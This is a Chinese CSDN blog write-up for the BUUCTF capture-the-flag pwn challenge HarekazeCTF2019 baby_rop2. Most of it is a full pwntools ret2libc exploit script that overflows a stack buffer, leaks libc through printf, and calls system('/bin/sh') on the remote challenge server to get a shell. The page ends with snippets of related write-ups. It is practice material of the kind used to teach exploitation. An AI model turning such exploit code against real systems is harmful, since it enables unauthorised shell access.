BUUCTF [HarekazeCTF2019]baby_rop2

最新推荐文章于 2024-05-05 22:46:05 发布
最新推荐文章于 2024-05-05 22:46:05 发布
阅读量367 收藏
点赞数 1
分类专栏: Pwn 文章标签: 网络 学习 python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/127563491
版权

1. Checksec

IDA Pro 静态调试

 

 

ret2libc

依旧可以使用上次的PoC

只需要略微改进

from pwn import * 
from LibcSearcher import LibcSearcher
#from LibcSearcherX import *
 
elf = ELF("/root/Desktop/Pwn Subject/babyrop2")
#libc = ELF("/root/Desktop/Pwn Subject/libc.so.6") 
io = remote("node4.buuoj.cn",27346)
#io = process("/root/Desktop/Pwn Subject/babyrop2")

# Get Pot and Got
printf_plt = elf.plt['printf']
read_got = elf.got['read']
main = elf.symbols['main']
rdi = 0x0000000000400733
rsi = 0x0000000000400731 
format_str = 0x400770

# Phase 1 --- Leak real address
print("--------------------------------------------------")
print("[+] Leaking real address ...")
print("[+] Phase 1 Inprogress.")
payload_addr = flat(b'A' * ( 32 + 0x08 ) + p64(rdi) + p64(format_str) + p64(rsi) + p64(read_got) + p64(0) + p64(printf_plt) + p64(main) )
print("[+] Payload = \n",(payload_addr))
io.recvuntil('name? ')
io.sendline(payload_addr)
#write_addr = u32(io.recv(4))
read_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print("[+] Phase 1 Completed.")
print("--------------------------------------------------")

# Phase 2 --- Get libcbase address and etc though real address
print("[+] Phase 2 Inprogress.")
print("[+] Trying got system and /bin/sh address though real address")
#libc = LibcSearcher("write",write_addr)

# Dump
libc = LibcSearcher("read",read_addr)	
libcbase = read_addr - libc.dump('read')
system = libcbase + libc.dump('system')
bin_sh = libcbase + libc.dump('str_bin_sh')

# Sym
#libc = LibcSearcherLocal("read",read_addr)
#libcbase = read_addr - libc.sym['read']
#system = libcbase + libc.sym['system']
#bin_sh = libcbase + libc.sym['str_bin_sh']

print("[+] Phase 2 Completed")
print("--------------------------------------------------")

# Phase 3 --- Print Addresses
print("[+] Phase 3 Inprogress.")
print("[+] Real Address: ",hex(read_addr))
print("[+] Base Address: ",hex(read_addr))
print("[+] System Address: ",hex(system))
print("[+] /bin/sh Address: ",hex(bin_sh))
print("[+] Phase 3 Completed")
print("--------------------------------------------------")

# Phase 4 --- Get Shell
payload = (b'A' * ( 32 + 0x08 ) + p64(rdi) + p64(bin_sh) + p64(system) )
io.sendline(payload)
#print("Successfully got shell , Automaticly cat flags ...")
#io.sendline("find . -name 'flag.txt' -exec cat {} \;")
io.interactive()

 

 

成功获取flag。 

Red-Leaves
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[HarekazeCTF2019]baby_rop2
z1r0的博客
12-07 883
[HarekazeCTF2019]baby_rop2 查看保护 有溢出,ret2libc即可。这里使用printf这个函数来泄露libc。 printf有两个参数。第一个用rdi来压参数。第二个用rsi来。泄露出libc之后,还是正常的rop。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('
[BUUCTF]PWN——[HarekazeCTF2019]baby_rop2
mcmuyanga的博客
10-04 4222
[HarekazeCTF2019]baby_rop2 题目附件 步骤: 例行检查,64位,开启了nx保护 运行了一下程序,了解大概的执行情况 64位ida载入,shift+f12检索程序里的字符串,没有发现可以直接利用的,从main函数开始看程序 利用思路: 程序很简单,buf的大小是0x20,但是读入的时候读入的是0x100,会造成溢出,我们要想办法覆盖返回地址为” system(‘/bin/sh’)“,那样在执行13行语句的时候,程序回去调用我们布置好的栈,从而得到shell 但是程序里没有现成
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2
空城惜梦的博客
06-09 406
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2解题分析漏洞利用payload解析payload 解题分析 按照惯例先checksec,发现开了nx和RELRO,又因为题目给了文件libc.so.6,所以猜测要需要构造ROP来布置程序执行路线图 运行程序来观察程序的逻辑,发现需要输入name,然后程序再把输入的name打印出来 64位IDA打开,发现buf缓冲区只有0x20个字节大小,但read却可以往buf缓冲区中写入0x100个字节,所以这里存在着栈溢出 shift+
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 656
pwn 64位 泄露libc版本
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
2. **构造ROP链**:根据需求,使用这些gadgets构造出执行特定操作的指令链。 3. **利用Netty进行数据传输**:通过Netty的编码和解码功能,将ROP链作为数据包发送到服务器或接收来自服务器。 4. **触发漏洞**:在适当...
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
arm64_rop_exploit:Arm64返回定向编程(ROP)漏洞
03-02
arm64_rop_exploit arm64 rop小工具二进制文件,用于将arm64反向外壳程序代码映射到内存中并执行代码这仅适用于目标arm64设备。 用于将rop小工具映射到内存中并从libc库执行shell代码的源代码。 在运行Ubuntu 18.04....
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
STM8_Unlock_Flash_ROP_issue_ROPCLEAR_unlock_stm8s003_stm8s103_
10-03
在STM8S103型号中,涉及到的"Unlock Flash ROP issue"指的是在编程或擦除闪存时可能遇到的问题,尤其是与Read-Out Protection (ROP)功能有关的障碍。ROP是一种安全特性,它防止未经许可的读取和复制微控制器内部的...
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2
Y_peak的博客
02-14 260
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2 题目地址:https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop2 checksec一下,64位,开启NX,应该要用到ROPgadget,先看看 在IDA中 思路 利用printf先leek出来一个地址,这里选用了read的地址。找到libc,计算偏移,最终算出,system函数地址和’/bin/sh’字符串的地址。由于是64位,注意寄存器储存参数。(参数小于等于
[HarekazeCTF2019]baby_rop
m0sway的博客
03-26 552
[HarekazeCTF2019]baby_rop WriteUp BUU_PWN
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2568
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
BUUCTF [HarekazeCTF2019]baby_rop
小白垃圾笔记2
05-13 189
不过因为这是64位程序,所以我们需要找一些东西的地址。main函数里直接是漏洞 ,第6行存在栈溢出。/bin/sh (当作system的参数)小白做题垃圾笔记,不建议阅读。system(调用系统函数·)pop rdi (用来传参)一次打不通可以多打几次。ret(用来栈对齐)
CTF buuoj pwn-----[HarekazeCTF2019]baby_rop
bing_Max的博客
10-11 1896
exp from pwn import * sh = remote('node4.buuoj.cn', 342414) # 连接一个远程靶机。 elf = ELF('./babyrop') # elf函数调用,elf可以 bin_sh_addr = 0x601048 system_addr = 0x601060 pop_rdi_addr = 0x400683 payload = b'a'*0x10 + b'a'*8 + p64(pop_rdi_addr)+p64(bin_sh_addr)+p64(
pwn7第七关
qq_18823653的博客
04-03 388
前面几个懒得写了,直接第七个吧,溢出点和前面一样get()函数,112字节,保护只开了NX程序本身没有system(),也没有/bin/sh,且栈不可执行,用ROPgadget也没找到有用的语句,但是程序是动态链接的,运行时会加载so库,可以用put()泄露出put的真实地址,又因为ASLR随机化不了地址底12位,可以用put真实地址的底12位查询加载的那个版本的libc.so,以及确定libc的...
[HarekazeCTF2019]baby_rop[BUUCTF]
最新发布
moonlightsunshin的博客
05-05 290
这个时候思路就很清晰了根据64位函数传参的特点构造ROP链就行,32位与64位传参的区别这里就不再赘述,读者可以看上一篇jarvisoj_level2_x64[BUUCTF] ,根据名字可以猜到这道题考的rop同时是64位的程序。用find -name flag查找路径再cat。
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值